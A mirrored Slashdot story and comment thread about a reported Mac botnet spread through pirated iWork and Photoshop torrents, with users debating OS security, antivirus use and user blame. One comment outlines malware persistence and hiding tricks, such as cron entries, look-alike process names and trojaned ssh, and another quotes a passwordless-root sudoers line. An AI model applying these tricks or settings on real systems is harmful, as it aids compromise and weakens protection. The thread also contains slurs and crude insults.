Slashdot Mirror
Zombie Macs Launch DoS Attack
Cludge writes "ZDNet has a story (and several related articles) about how Symantec has discovered evidence of an all-Mac based botnet that is actively involved in a DOS attack. Apparently, security on the exploited Macs (call them iBots?) was compromised when unwary users bit-torrented pirated copies of iWork 09 and Photoshop CS4 that contained malware. From the article: 'They describe this as the "first real attempt to create a Mac botnet" and note that the zombie Macs are already being used for nefarious purposes.'"
... that somebody didn't do it the old fashion way and post that the website host said bad things about Steve Jobs?
"Common sense will be the death of us all"
the end of innocence for Apple users.
Don't they know that Macs are impregnable? All of the stories over the last decade about how Macs don't get viruses prove it.
... and laugh and laugh... Oh, we're Mac users - we don't need stuff like virus and malware checkers! Now, let the explanations begin about how this is a wonderful intuitive "feature" and not a flaw.
Whoever actually believes that is retarded. I have two software firewalls, a hardware firewall(router), anti-virus, anti-malware, and anti-spyware on my Mac, same as on my old PC. I didn't get infected on PC, and I'm sure as hell not going to get my Mac botnetted.
I always wondered when those pirated copies of software would be become malware vectors. Maybe the quickest way to stop software piracy is through evil copies of legitimate software.
it just... BBRRRAAAIINNNNSSS
I find it amusing that in this case it appears the inability to run Photoshop on Linux is a good thing.
I'll subscribe to Slashdot when I see a month without a dupe, a typo, or an article the "editors" didn't read.
I use Mac, and I love it! Macs never get vi
NO CARRIER
Anybody want my mod points?
I don't understand why this is a story.
Its just another set of hackers with a different equipment.
W4r3Z are for hackers!
Sig this!
But these iZombies have such cool eye-candy the Windoze and Linux could never catch up in the cool factor in a million years!
sed -e 's/Chuck Norris/Rajnikant/g' joke > fact
If a user is tricked into installing malware on a machine, the machine is infected with malware.
It's a shame people think Macs are somehow magically protected against viruses and other nasty computer stuff, merely by virtue of the manufacturer and operating system. It's probably more of a shame that Apple has, in the past at least, marketed Macs as being (more?) immune to viruses than PCs - something which somewhat true, but only for statistical reasons.
It's like STDs - if you're careless and go sticking your junk everywhere without taking precautions, you'll probably catch something cruel, eventually.
So does this mean that Macs are finally Enterprise Ready?
From what we know so far, apparently the botnet was created by a trojan and does not spread.
I'm a Mac user who doesn't run applications downloaded from completely untrustworthy sources like pirate p2p networks and you're correct -- I don't need a virus or malware checker.
Mac: Hi, I'm a mac!
PC: Im a.. *cough* PC...
Mac: Oh, you must be sick? Well I can't get sick.
PC: really?
Mac: (whispers) "Nobody knows I got HIV"
PC: Ahhhh... I just got a cold
Mac: See! I don't even have a cold!
The obvious solution is to switch to Linux, because everyone knows it has no viruses and never will.
I SAID NEVER WILL.
Sounds like someone has their panties in a twist. You might forget that strict permission levels don't imply security when the person behind the keyboard is an idiot.
Om, nomnomnom...
You'll have to settle for vim then!
I'll subscribe to Slashdot when I see a month without a dupe, a typo, or an article the "editors" didn't read.
Man, I run Vista and I don't have any of that (built-ins are disabled). I only have virus scanning done on a weekly basis, and somehow despite not having forty pieces of software dedicated to second-guessing me I still don't have any viruses or malware.
Simplest thing anyone can do is train the thing between the chair and the keyboard.
Shut the FUCK UP!
Purposefully installing malicious software does not indicate a vulnerability. The user intentionally installed a piece of software that is doing exactly what it is designed to do.
There isn't an operating system on the planet that can protect you (or itself) from fraudulent user activity.
Platform advocacy is like choosing a favorite severely developmentally disabled child.
I'm a user who doesn't run applications downloaded from completely untrustworthy sources like pirate p2p networks and you're correct -- I don't need a virus or malware checker.
Fixed that for you.
There are shills on slashdot. Apparently, I'm one of them.
Hear hear!
If you do common sense things - like not running random software from the internet, keeping your machine patched, and turning off unnecessary services - you don't need anti-virus software running constantly.
The problem is, computers are widely owned by people who don't know about how to use them safely and often act as if they can't be bothered to learn.
Essentially, this makes it impervious to viruses. Even trojans are thwarted because smart users (Mac users) don't execute programs they don't know the origin of.
No computer system can withstand prolonged exposure to idiot owners. Macs are no exception. Your statement only confirms that :D
"Common sense will be the death of us all"
A botnet that just works.
The musings of just another geek and his junk.
All you Zombies Hide Your Faces.
Knowledge is how to play a game, intelligence is how to win, wisdom is knowing what game to play.
What do you mean, FUD? A trojan sure can run, and the article notes it IS running. There are no checks against trojans that run with user permissions. Heck, you can even schedule them to run at startup.. easy as pie!
If a user is an idiot, they can get malware on a Mac. Viruses are tough, but trojans are a cinch (I'm rusty, but could come up with a shell script in a few minutes and set +x on it and there you go). Linux would be just as easy.
So it's not FUD. Mac users who are not savvy can certainly get malware. If you know what you're doing, and stay away from P2P or other downloads you can't identify as "good," you're fairly safe (more so than unpatched Windows, for sure). But you're not immortal, and this article is proof of it. Even if it is from a fearmonger with self-interest like Symantec.
Sorry, how does conficker spread again?
As a poster mentioned above, it requires the user to manually install the trojan.
What I'd be interested to see is how OSX/Vista/XP/Linux stack up in terms of "security when user is not a moron" tests, actually. Take an average Slashdotter's machine: patched up to date, probably using Firefox, won't feel the need to install the latest smiley pack from evilhax0rz.com/CuteSmileysLOL, more likely to be running as a limited-permission user day to day, and so on. Are any of those machines likely to be compromised at all? If so by what vector? It'd pretty much have to be a worm or stealthy malware - both of which are (I would guess) going to raise flags with the savvy user on any modern OS by forcing a permission box to pop up.
this makes it impervious to viruses
Methinks thou dost protest too much.
It doesn't matter if "it" is impervious. Users are not. If they want to install and run a poison app. Not if they are so anxious to pirate commercial applications that they're willing to hold their breath and hope that the nice guy in Romania who is "sharing" his kindly cracked copy of CS4 would never, ever do anything naughty. Not if they're just stupid app users who bought a Mac because everyone promised them they'd never have to ever ever worry about such things, and that false sense of security makes them willing to run anything that's handed to them, because, gosh, nothing can hurt them and their magic Mac.
Don't disappoint your bird dog. Go to the range.
How would they even know what to learn in the first place?
And rightfully so. If the damn thing needs that much care and feeding, it is defective and should be returned!
I know this will be laughed at, but I'll post it anyway:
I've been running Vista on several computers since around 4 months after it launched, and on some of them I *do* run p2p software. I have anti-viruses on all of them, and not *once* have I ever detected anything.
If you keep windows up to date, and you _know-how-to-use-a-computer_, you're not in any more danger than Mac users.
Don't download/run executables from untrustworthy sources, don't download *any* executables from p2p networks, and don't use IE.
Apart from that, it's the usual: Don't open attachments, be aware of phishing, and don't parade around warez sites (at least not with scripting turned on).
Now go ahead, get it out of your system...
"ZOMG! He's using VISTA! BAN HIM!!"
Entomologically speaking, the spider is not a bug, it's a feature.
I really doubt this particular trojan could form much of a DDOS attack. It is a poorly hidden and pretty simple to find and dispose of code, and its presence was found quickly and quite was well known.
Amen. I ran a windows computer of my own for four years and I ditched the anti-virus within about a month. If you're intelligent about your computer use you really don't have to worry about much at all. Fun little trick, I changed my main directory from c:\ to k:\ and that seemed to immediately and drastically decrease the chance of malware/spyware/etc. It seems they hardcode a lot of the directory information and not having any drive with c:\ worked quite nicely. I run a mac now and I still don't use AV software, no point.
"Educate the mind but never at the expense of the soul."~Blessed Basil Moreau
Seriously? A download, installed, and password prompting program is a vulnerability?
That must mean that apple's Remote Desktop is a huge vulnerability. Giving the attacker complete control of the victims system, and the ability to execute remote code! Oh the horror! Oh the humanity!
MAC users should be rejoicing around the world! What this actually means is that hackers are noticing MACs are gaining in population and and they see profit in targeting them. What's going to fall next, Rome?
I'm curious - how do you know you've not got a virus if you don't run an AV scan to check?
Take that, PC gamers!
Assuming the worm/malware is stupid enough to raise said flags. The goal is to avoid that kind of thing and use exciting local privilege escalation exploits.
Your argument is incredibly flawed because I know just as many idiots (in a computer sense) who run Macs as PCs... mainly for the reason that they're "hip" or "look cool/cute/shiny".
I downloaded them but I made sure not to pick the versions with the malware first ..
It's about time Macs were brought into the fray of malicious software. As a Mac Fanboy, I'm tired of feeling left out.
As the saying goes, "There is no such thing as a free lunch".
If you don't know where it came, then don't download it.
There is no such thing was an absolutely secure system since the user can override the security features.
Another saying, "Intel inside, idiot outside"
Photoshop cs2 and cs3 work with wine =)
As a lot of people have probably mentioned already, how is it Apple/Mac OS X's fault that malware was installed on the computer? The malware is a program after all, which was given administrator privileges when the pirated iWork was installed. It didn't exploit anything; the user installed it manually. The same thing could happen on Linux/BSD for pirated programs that are binary-only. Same goes for any MSOffice for Windows from TPB.
No, the funny part is that the users who torrented and installed pirated copies of iWork 09 and Photoshop CS4 got exactly what they deserved. Instant karma.
Any sect, cult, or religion will legislate its creed into law if it acquires the political power to do so.
Witchcraft, demons, and bad karma.
I don't believe in time. It's a grand conspiracy designed to sell watches.
macinfags just got shit on.
It's a shame that the level of intelligence and knowledge of the posters to Slashdot seems to still be in decline.
I would think that anyone who wants to use this "revelation" as some kind of troll against OSX would at least be able to differentiate between a virus and a trojan.
There's a decent chance there will be some kind of unpatched OSX vuln that will be exploited ala what you see on a Windows machine, but until then you should just stew in silence and wait for your opportunity to post your "See OSX is no better than Windows" messages and then you wont look like such ignorant fools.
If you can install software on a computer, you can install software that is malware as well. I doubt anyone can fault Apple for allowing end users to install software that they choose to install.
Doesn't require that the user is an idiot, just that they are not computer-savvy. Which is the exact audience Macs are marketed to.
Human beings are part of the security equation. If your security model requires more expertise than your typical user actually has, then it's a crappy security model.
Most mac users aren't very smart, of course there are exceptions (I run a mac your insensitive clod!)
I know well where this torrent would come from, TPB or demonoid, and I'm willing to use plenty of torrents from both sites.
This is simply unproven for all the reasons outlined in your post. Until you see *UNIX widely deployed as a "desktop" OS, all claims that UNIX is inherently more secure than Windows are nothing but untested theories.
Which is exactly the point we were trying to make about Vista SP2, in a previous thread. So what's good for the goose is good for the gander.
At least *nix variants have been around longer. And I can say from my own experience that since switching to *nix, my uptime and productivity have greatly increased.
I'm sure though that symantec will find a botnet on linux as soon as they have a product that works on linux desktop systems.
I'm a Mac user and I'm looking around for some virus detection software. Do any other Mac users out there have any positive experiences of the current crop of malware/virus software available for the mac? Any recommendations? Anything to stay clear of?
All my experience with PC virus software has been pretty negative, background processes that gobble up entire cores and half your memory, reducing the machine to a gibbering wreak. I'd like to run something I can pretty much ignore (other than making sure that it is up to date). Even AVG, which used to be fantastic, is now a terrible resource hog.
While it is still the case that macs are much less likely to get hit by malware, and there are currently no known examples of a self-propagating worm that doesn't require a stupidity/carelessness on the part of the user (that I'm aware of), things are getting a little more dangerous. It would be nice to be prepared, hubris is a dangerous thing.
Paul Leader
So, you can infect OS/X computers after manipulating a program and tricking an user into voluntarily installing the malware!
I am surprised! Although of course, it would be more impressive if it was like in windows 98 in which connecting to the internet rendered you vulnerable. Or how about a more recent example in which you just had to plug a USB drive? Sorry but it still sounds very easy to fill a windows computer with viruses in comparison with this.
Copyright infringement is "piracy" in the same way DRM is "consumer rape"
I have been free of any anti virus and any viruses since Vista's RC release (now on win7)
I keep mine at E:\
Heres to agreeing =]
The blogger who reported this perhaps didn't realize that he had just outed himself as a warez user.
"It's the height of ridiculousness to say for those 9 lines you get hundreds of millions."
How do you know you have a virus when the first thing any virus or malware worth its salt does is disable the virus scanner? Virus scanners do nothing but slow your system down in exchange for giving you a very, very false sense of security. I would never trust a virus scanner to tell me I had a virus. If your system got 0wned, you are well and fucked; you can't trust anything on it, even (and especially) the virus scanner.
No sir, I've never ran a virus program and don't plan to in the future. The best "virus scanner" is knowing what shit should be running on your computer and what shit shouldn't. If you see any suspicious process, consider it a red-flag. Oh yeah, and "explorer.exe" is listening to several ports, has 4 dozen TCP/IP sessions open, and is checking random POP3 mailboxes, you might have a problem too. A virus scanner wouldn't have detected any of it though, because the virus scanner would have been 0wned too.
Absolutely, which is why it would make an interesting comparison. I have no idea what the actual state of malware (or unpatched permission escalation vulnerabilities) is at the moment, but I'd think that's exactly the kind of information the smart/geeky user would want to know about for their own system.
As far as I'm aware conficker relies on an issue that's long since been patched. This Mac botnet relies on users volunteering their password to any old bit of software with dubious providence. I'm reasonably confident that my systems are, therefore, safe from these issues. </tempting fate>
Maybe, just maybe, we'd find out it's not often worth the effort, or indeed even possible, for the malware authors to stealth their applications so the smart users won't see them when there are plenty of other users out there to prey on instead.
Is there such a thing as a "mac user" and a "windows user" anymore?
Anyway, you "windows users" get a good laugh off, meanwhile us in the 21st century will continue to use our computers whether they have macos, windows or linux.
If you do common sense things - like not running random software from the internet, keeping your machine patched, and turning off unnecessary services - you don't need anti-virus software running constantly.
you don't need anti-virus software running constantly
running constantly
constantly
Does that help answer your question? From the GGPP:
I only have virus scanning done on a weekly basis
In short, he does scan, just not every second via a memory resident application.
Oh, was that my outside voice?
For what it's worth, and from what I've read about this, it seems like a virus checker wouldn't have identified the problem. A firewall would have, though. The malware was an infinite looping PHP script that opened and closed 100 connections to the target site via CURL. The thing that surprised me is that apparently that means that Macs come out-of-the-box with a working web server and PHP installation, enabled even. Although I guess a web server isn't required in this case.. it was a command line call to php with inline code to execute ("php -r "). That probably doesn't require Apache to be running.
"Two things are infinite: the universe and human stupidity; and I'm not sure about the universe." Albert Einstein. "You make your choices and you take your chances," P.T. Barnum.
I find it interesting that the compromised macs have been used as zombies for a DoS attack. It doesn't seem like the smartest use of newly compromised systems, as such a use of a system can be so intense in terms of memory and bandwidth usage that it should be fairly easy for even a novice user to notice that something is awry.
I'm rather surprised that the people behind this didn't go for something less obvious, like spam propagation.
Damn_registrars has no butt-hole. Damn_registrars has no use for a butt-hole.
You dont need to stealth them that much really. The malware that runs on Linux uses the same techniques as the ones on windows. Yes, Linux does have malware of its own--usually in the form of some IRC bullshit for either botnet control or warez. Typically malware on either system will do one or more of the following:
1) Add themselves into Cron/Task Scheduler to ensure they get re-installed. /dev or something like that *and* tuck into some random long hidden directory. On Windows... same thing. Bury yourself in C:\windows\system32 and also live in "C:\Program Files\C0rel Draw".
2) Use process names that look familiar-ish (though I've seen a couple on Windows that are just random filenames, which suspect might be to make them un-googleable)
3) Start up as a daemon/service
4) If they are any good, replace system executables with their own. Like replace ssh with their own version that sniffs your passwords or replace "explorer.exe" with some fancy new version that sends out spam.
5) Try to live in both hidden and "obvious" directories. On linux, I've seen shit get tucked into
6) I did mention cron/task scheduler, right? Always watch for that... you'll forget and wonder why shit is still running on your machine.
ZOMG! He's using VISTA! BAN HIM!!
Oh, um, yeah. So am I. Same story - no AV tools on my personal box (XP64), only on the kids' and wife's PCs. I don't trust the kids at all from that perspective ... And the firewall/IDS shows no unexpected activity.
May I be the first to laugh...
Not if you're a Linux user.
... and laugh and laugh... Oh, we're Mac users - we don't need stuff like virus and malware checkers! Now, let the explanations begin about how this is a wonderful intuitive "feature" and not a flaw.
Mac users aren't the only ones living in glass houses, here. There's something to be learned for everybody here. If Mac user humility here is your highest concern with this article then you are turning into what you despise.
"I like to lick butts!" by MobileTatsu-NJG (#32700246) (Score:5, Informative)
Apache is built on, but turned off by default on OS X. A user has to turn on "Web Sharing" for apache to start.
OS X does default the firewall off, Apple may want to reconsider this at some point, just as a general precaution.
Nor does it fix anything when you have a critical vulnerability in the operating system... http://www.h-online.com/news/Root-exploit-for-Mac-OS-X--/110968
Debian and RHEL use pgp signatures on packages by default and they check if the signature is good.
There are problems with both of them at the moment, but there are teams actively working on the problem. (and have been for some time now.)
Microsoft is trying to do this with windows drivers by demanding that they are signed. But that is not really working due to various issues.
Most *N*X distributions have used md5 sums to verify packages but that has been proven to be subvertable so there is a movement afoot to
create proper pgp infrastructure.
It is amazing how many commercial apps for RHEL have as step one of the install process: Disable SELinux (Zimbra, Oracle)
Linux distributors are aware of the problem and are trying with limited success to implement solutions.
Debian seems the furthest along on creating the infrastructure, while Redhat seems to have the best tools.
So, while you could probably do something similar on Linux the preventative steps are being taken.
Work bio at MMWD
I suspect that this botnet has been created by a geek that is sick to death of uneducated Mac fanboyism, and in a small way, I have respect for that.
No, it wasn't. This botnet was created by a computer criminal who saw an opportunity to capitalize on people who install pirated software either because they are to clueless to know the risks or because they have deluded them selves into thinking it is riskless act. The lesson we can all learn from this is the following:
"If you download pirated software off the internet and install it on your computer you run the risk of installing along with it carefully crafted malware that your security software or whatever other precautions you are taking may not be able to protect you against."
Note that this basic lesson is true on all incarnations of Mac OS X, Windows, Linux or any other network enabled operating system you can download pirated software for.
Now please crawl back under your rock and learn to write better trolls...
Only to idiots, are orders laws.
-- Henning von Tresckow
Something about Internet connections and USB storage devices, as far as I know. Also, from what I've read on the Internet, these stories of people still getting infected with Conficker invariably involve unpatched Windows computers.
Sorry, can you please remind me how this relates to the user a few posts up who isn't computer-retarded?
Let q be a radix > 1. I am in ur base-q, killing 10 d00ds.
OS X may be harder to compromise but it was only tyme before Macs were infected. And as Macs gain market share more Macs will be compromised. I don't think any thing, OS, can ever be compeatly secure.
Faclon
Should there be a Law?
Don't you mean "iDiot"?
*ducks*
-Noc
forgot to close that b tag, sorry about that :-(
%homedrive%
Sounds like someone has their panties in a twist. You might forget that strict permission levels don't imply security when the person behind the keyboard is an idiot.
Honestly speaking, I can understand his panty twistedness. I'm suffering from it, too. For the last several years here on Slashdot I have heard all about how Windows' popularity causing more viruses was a myth and the magical thing about Linux was that it was 'more' secure because of its permissions structure and yadda yadda yadda. But now we get to Apple, who frankly has a lot of people here looking to put down, and suddenly the reverse 'true'.
I'm not an Apple fan, nor am I Microsoft or *nix hater or anything like that. (Frankly I cannot even cast stones about the behaviour here as I have contributed to it on other topics.) I just feel like I'm listening to Rush Limbaugh sometimes. It's all about the agenda, not about facts or even best pratices. It is frustrating. Bullshit is still bullshit even if the majority agrees with it.
"I like to lick butts!" by MobileTatsu-NJG (#32700246) (Score:5, Informative)
I seem to recall this was why Bruce S. switched from investigating "pure geek" attacks to the social ones.
My first Journal Entry ever, in 8 years! http://slashdot.org/journal/365947/aphelion-scifi-fantasy-horror-poetry-webzine
Is there a utility out there that would do this one simple change across the board and fix all the links that needed it?
My first Journal Entry ever, in 8 years! http://slashdot.org/journal/365947/aphelion-scifi-fantasy-horror-poetry-webzine
That and what's so strict about OSX's permission levels?
The default user has permission to overwrite Safari, iTunes, and everything inside /Applications.
The problem might be partly that users install legitimate software the same way they do it with software of questionable origin. That is true in Windows and appears to be true on MacOS too.
If you however use signed central repositories to install trusted software instead, you will have a very different user experience if you try to install some random piece of software from the Internet or from p2p networks, e.g. installing software via Add/Remove Programs vs. downloading it manually, making it executable and running.
It won't guarantee safety for a determined user, but a different user experience would sure scare many newbies off installing such malware.
I am a PC. c:
that a lot of "pirated" Bit Torrent software contains malware. Not just the Windows versions, but the Mac and Linux and BSD Unix versions as well.
When you download pirated software you take a risk that it contains a trojan.
I've even seen PDF files that had HTML exploits in it that got detected by antivirus. Read the comments on most Bit Torrent web sites the users will complain that it contains a virus. You don't have to download it to test it, the people who already downloaded it will give feedback that it contains a trojan or malware.
When you download pirated software you are taking a big chance, it isn't worth it when a majority of things are infected. That is why I look towards Free and Open Source Software as alternatives to commercial products.
Remember, Slashdot does not have a -1 disagree moderation, and no, troll, flamebait, and overrated are not substitutes.
iBot, same malware at an outrageous price
Antivirus Protection
load "$",8,1
Still, it will be a matter of a different user's experience in Linux. You may make malware installs proceed the same way as normal software in Windows and MacOS, but it is much harder with a system which users routinely use signed repositories to install most of their software.
In other words, your success will be very limited because the experience of installing malware will be very different to normal software.
There isn't an operating system on the planet that can protect you (or itself) from fraudulent user activity.
The NSA and DoD would disagree. The whole Common Criteria system is designed to mitigate fraudulent user activity.
Of course it's silly to think that just because something got an EAL 37++ rating means it's "secure", but the whole point in going for a rating is thinking about how things can be broken.
Correct me if I'm wrong, but a trojan doesn't qualify as a "security issue" on the part of the OS.
You're wrong. Anything that compromises the system is a security issue for the OS. Now, I'm not assigning blame or being critical or any of that pejorative stuff. I'm simply pointing out that this is the business of the OS, and it's a security issue.
Looking forward, we'll someday have an OS that efficiently detects malware behavior, or enforces good behavior in some other way. Trojans are not a "game over" scenario for the OS.
It's related to the botnet brute forcing from last week.
http://it.slashdot.org/comments.pl?sid=1196525&cid=27551519
http://it.slashdot.org/comments.pl?sid=1196525&cid=27552175
Well, I am not a MAC user, but for this problem they do not need a virus detector or malware checker as these would not detect the problem. The software was after all installed by the user at a level of priviledge that allowed it to do all that it was doing.
The problem here is not in the OS, as others have pointed out pretty well any OS would allow this, the problem is "PEBKAC", ie the user/admin has installed software that has features that they don't know about. Realisticly there is actually no way of knowing everything that a software package does, unless you have the source plus sufficient time and knowledge to figure it all out. Practically this means being a bit careful about where you get your software from. It seems these users were not very careful.
The fact of the matter is that the Max OS (BSD, doncha know) has very strict user permission levels. This gives it a strong protection mechanism against unwanted programs running without the user knowing.
Guess what, so does Vista.
Even trojans are thwarted because smart users (Mac users) don't execute programs they don't know the origin of.
Well, apparently, there are enough not-so-smart Mac users to form a botnet, in case you bothered to read TFS...
This really just goes to show that, in most cases, the attack vector for virus/trojan/whatever infection is not technical but social - something that has long been the case on Windows due to its ubiquity, but now we can welcome OS X to the family as well. It doesn't matter how good your security is if your user is clueless, and will consistently answer "Yes" to any "Do you want me to install a botnet client on your box, send your CCs to the author, and download some child porn for the fun of it?" prompts.
I think OSX was a unix based system.
There are plenty of ways to get admin if it is needed/useful. One is simply to sneak in with a software package. Various software does need admin to install and even if it doesn't is the user going to know that? Probably not, they'll give it admin. Another is to setup and watch silently and when the user enters their admin password, capture it. Then of course there's always the possibility of using a local privilege escalation exploit.
You are completely correct that it is not real security. This is made even more so by the fact that most users simply view it as a hoop to jump through. They don't ask themselves "Should this actually need admin?" They just hand it out whenever asked. To the extent it does any good at all, the users have to actually treat it as more tha a hoop and very few do.
If apps can be installed at a given level, malicious apps can be installed at that same level. There is no way to say "Only good apps have permission." Further, what would is accomplish in terms of damage control? Ok so you saved your OS. Great. Is that really what you care about? I dunno about you, but I can replace my OS and drivers in about an hour. Apps take longer, that could take a couple days to reinstall and configure all those. However my data is what really matters. It is the only thing that'd really be a problem to lose.
So suppose all apps could install as the user, or as a slightly privileged "app" level. What's that gain you? You get an evil virus that then wipes out everything it has permission to, which is all your apps and all your data. You still have the OS but what did that buy you? An hour saved in reinstall time? Are you REALLY going to trust that there isn't something deeper in the OS or would you reinstall anyhow for safety?
Compartmentalization of damage works on a multi user system for sure. If a user gets a virus, better that is hoses only their stuff, not everyone's. However the current system of "apps get installed as root" works well for that. Users have access to their own data only, no system data, no apps, no other user data. However on a single user system it's moot. Since there's only one user, protecting them is all that matters. Protecting the OS gets you fuck all.
Guys guys guys... you're missing the point. It doesn't matter if the attack was social or security based. The fact is it is a Mac based botnet. That's it. No double standard here, just reporting that a Macintosh based botnet is up to no good. The bottom line is that security is up to the user. I could go %sudo ALL=NOPASSWD: ALL in my /etc/sudoers and security goes right out the window. It's all in control of the user. People are (as a collective) just not that smart. There can never be a secure system as long as there are users of the system.
Which (no pun intended) is steadily becoming an Apple.
Apples are becoming the low hanging fruit? Windows has OS X beat on that score.
Falcon
Should there be a Law?
Any time the fact that administrator doesn't really protect you and so on was pointed out they said things like "That's all theoretical," or "Well there hasn't been any attacks." Ya well ok, now it's not because there has. Now you need to shut your yap about how invincible your OS is and start taking some proactive security precautions.
Many Mac users strike me as people living in a gated community. Their community is separate and exclusive and has low crime, and thus the appearance of security. They see their nice security guard at the gate and think "I'm safe here." So they then proceed to leave their doors unlocked, have no alarm, no safe for valuables and so on. They espouse how safe they are living in this nice community when really they are nothing of the sort, it is all an illusion. Then something like this happens.
I have always advocated, for any OS, proactive security and defense in depth. That means doing things to prevent problems before they happen. Don't get a virus scanner because you've been hit with a virus scanner, get one because you haven't and never want to be. Also, don't rely on a single layer of defense. Don't say "Well I don't run as root/admin so I'm safe." No, that is A layer of security not THE layer. Run as a deprivileged user, and have a virus scanner, and a system firewall, and a network firewall (NAT works ok too), and keep your system patched and so on. Do multiple things to keep yourself secure.
If you have a deep defense and you are proactive about security, you'll likely stay secure. If you rely on a single, flimsy layer of security and the fact that "I've never been hacked before," you are probably going to have problems, sooner or later.
In the case of Macs, it'll only get worse if they keep getting more popular. The more there are, the better a target they are, and also teh more people who will know enough to make evil shit for them.
Comment removed based on user account deletion
welcome to the jungle OSX
"You can kill the revolutionary, but you can't kill the revolution."-- Fred Hampton
As a long-time Mac (and PC) user myself, I've been known to give someone a "simplified version" of the truth, telling them "you won't have any virus or spyware problems on a Mac".
It's not that I'm some clueless user who doesn't know better. It's that I have a pretty good idea of what the individual does with and expects from their computer. Judging by that, and knowing they're not a very "technical" user to begin with, I know that practically speaking, they really aren't going to need to worry about infections on their Mac.
(So far, just about all of the trojan horses and viruses people mentioned for OS X involved downloading files of unknown origins, or running something you received in an unsolicited email. When you have a user who is already scared to open any email at all from people he/she doesn't know, they're hopefully in good shape there. They're certainly not savvy enough to fire up bittorrent and start seeking out pirated software, either.)
OS X does default the firewall off, Apple may want to reconsider this at some point, just as a general precaution.
They should have considered that years ago. Microsoft beat them to that realization!
It depends on the variant. The first used a buffer overflow in NetBIOS, for which there was a critical patch about two weeks before it appeared. Those that had a decent firewall were not affected even if unpatched.
Then later variants used AutoRun, those users that either disable that or don't put suspicious media into into their computers were not affected.
Then later variants also tried to spread over writable shares and even did dictionary attacks. Those that had reasonable permissions, decent passwords, or paid attention to unusually slow network performance were unaffected or knew to wipe and reinstall.
So basically if you were not a moron computer user and did any reasonable subset of safe computer precautions you have no problem with conficker even without AV software in the mix.
By auto-attacking people who don't install OS updates.
This space for rent.
nice reality check
The truth is that a Mac is less likely to be targetted because it's a minority operating system.
I've never understood this assumption. It seems contradictory to say the minority is less likely to be targeted when IIS servers get popped a lot more than Apache when Apache is more widely distributed.
While Apache and IIS have 46.35% and 29.47% market shares respectively it could be that IIS is cracked more because it's less secure.
Falcon
Should there be a Law?
Don't forget that those running linux also have appropriate mount options set in fstab, such as noexec, nodev on /home and /tmp and /usr is set to read-only once things are installed.
Mod me up/Mod me down: I wont frown as I've no crown
people are talking about how poorly designed Windows security is and how the user usually always runs as "administrator"
Speaking of always running as administrator, it may interest you to know that the trojan requires the user to manually enter an administrator password before it can spread on the latest version of OS X.
.exe file can root your PC, but you need to enter an administrator password to get a trojan running on OS X.
So no, it's not a "double standard" to point out that double-clicking an
Do you think the botnet owner charges an apple "tax" as well?
Use protection.
Regardless of what operating system you're on, there's this little feature called code signing.
If Apple actually signed everything they make, including the Setup/Installer packages, and drummed just that one little piece of security into their users then this type of malware-embedded-in-Apple-software attack just wouldn't be possible.
But these people were downloading a cracked version of the software (just not entirely in the way they expected). So they would expect that this would fail a validity test.
Obviously code signing would help in the user expected that whatever they were installing was totally genuine.
Ever stop to think
The hole Conflicker used was patched 2 full weeks before it started spreading. If you don't update your computers, yes, they'll be insecure-- again, that applies to *all* OSes.
The only virus I've gotten in a Windows NT-based OS (2000, XP, Vista) was delivered via Sun's Java. Maybe I've just been lucky.
Comment of the year
This story brought to you by the department of redundancy department.
Don't you mean "iD10T"?
*ducks*
Here, let me correct that for you
"I ph34r teh Geeks, even when bearing .GIFs." -- Cassandra (Paraphrased)
Knowledge is power. Knowledge shared is power multiplied.
There is no patch for human stupidity. Just goes to show that if you do illegal file sharing you need good antivirus regardless of platform.
The 1980's called, they want their software security model back.
This was already implemented with the BSG 9 virus on the Amiga.
http://agn-www.informatik.uni-hamburg.de/catalog/amiga/html/bgs9terr.htm
Xix.
"Everything is adjustable, provided you have the right tools"
I'm not entirely sure I believe the "research team at Symantec" - to me this sounds like a great opportunity for the Symantec corporation (which SELLS ANTI-VIRUS/ANTI-SPYWARE software) to shatter the confidence of Mac users and convince them to purchase security software...from who else but Symantec.
Of course, I'm not much of a fan of Symantec's products in the first place - seems like they charge an awful lot for something that rarely works. As a former computer repair technician with about a decade of experience, I'm not just making this up out of the blue - Norton security software was great up until about 2002 - but the product has been steadily going downhill at a rapid pace ever since.
This story is CLEARLY false because I've been told by various marketting materials that Macs do NOT get viruses and are way too young-and-hip-and-sexy to be involved in something like a bot-whatchamacallit DOS attack thing. BRB going to fire up my iTunes on my iMac and plug in my iPod so I can transfer some songs I downloaded on my iPhone.
I'm a Mac user who doesn't run applications downloaded from completely untrustworthy sources like pirate p2p networks and you're correct -- I don't need a virus or malware checker.
Even if you do as you say, and don't run software downloaded from untrustworthy sources, if you share documents with Windows users you should still use AV software. Though you may not get infected you can pass to a Windows user malware. I'm not too concerned about my Mac being infected, but I am concerned about infecting others. And I use NeoOffice and OpenOffice.org.
Falcon
Should there be a Law?
Periodically boot from a CD and do a disk scan. I'm not saying never use AV software. I'm saying, you don't need it running constantly, and that it generally sucks up resources for very little benefit.
Most people's personal computers run with the user logged into an administrative account, or an account that can get administrative privileges with a password prompt, so bypassing or disabling AV software isn't that difficult a task; and that's not even considering the possibility of stuff that spreads using unpatched vulnerabilities.
Assuming that's not sarcasm, do you really think it's unreasonable to expect a computer user to be sufficiently aware of computer security to know downloading warez and installing it can screw up your computer? What if it asks for your admin password to install stuff, like lots of software packages on lots of operating systems do?
Should average users not have the ability to install software on their computers, or should the manufacturers of the OS design software that's so fantastically advanced it knows that a given app is malware and another isn't? And if you know the secret for doing the latter 100% of the time, please, please, please let everyone else in on it so we can be rid of the spam botnets.
The last tyme I tried to update my NT PC it was no longer supported by the Windows Update website, and I had the brand new PC for a whole of 2 years. I ended up taking it to the Geek Squad to have it updated.
Falcon
Should there be a Law?
Oh yeah?
It is reported that Jobs is the main zombie.
Just a rumor of course! ... but yes indeed- the formaldehyde has been replaced by Pinoqachole.
So basically if you were not a moron computer user and did any reasonable subset of safe computer precautions you have no problem with conficker even without AV software in the mix.
The average user right?
Falcon
Should there be a Law?
What version of NT was it? 4? Of course Geek Squad didn't exist when NT4 existed.
In short, I have no clue what you're talking about. Windows Update website supports Windows 2000, and all newer versions of NT have auto-updaters that work without logging on to the website at all.
Comment of the year
I second any argument that supports intentional DDoSing this page.
Please, that is not the proper way to run a Windows box. Since XP, it has been possible to use "Run as" to get over this constant login in and login out hurdle. It's not harder to use than typing "sudo." Power Users are also able to do quite a lot while not being able to completely f*ck the OS Of course, setting proper rights on folders is something you should do and have learned from other OS's.
